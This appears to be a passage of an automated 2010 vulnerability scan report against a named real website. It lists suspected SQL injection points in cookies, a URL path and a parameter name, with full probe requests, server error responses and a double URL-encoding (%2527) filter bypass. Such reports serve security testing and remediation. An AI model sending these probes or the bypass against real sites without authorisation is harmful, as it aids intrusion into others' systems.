The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:12:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:12:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:13:00 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:13:01 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:09:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:04 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:09:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <div>However, the documentation (at the time of writing this) fails to call out a common issue that I've seen coming up for a number of Urchin users: <strong> ...[SNIP]...
Request 2
GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:09:05 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:13:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:13:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:13:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <div>However, the documentation (at the time of writing this) fails to call out a common issue that I've seen coming up for a number of Urchin users: <strong> ...[SNIP]...
Request 2
GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:13:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Content-Length: 76 Connection: close Content-Type: text/html
Database Error: Unable to connect to the database:Could not connect to MySQL
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:11:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:11:46 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:11:48 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:11:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23268
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:14:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:14:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog'/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 07:28:31 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 07:28:32 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /blog''/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:28:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/62-urchin/88-urchin-vs-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:06:11 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/88-urchin-vs-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:06:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=40a1140278fbef8b07f02061e9721c9c; path=/ Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
1.68. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment&1'=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:25:54 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment&1''=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
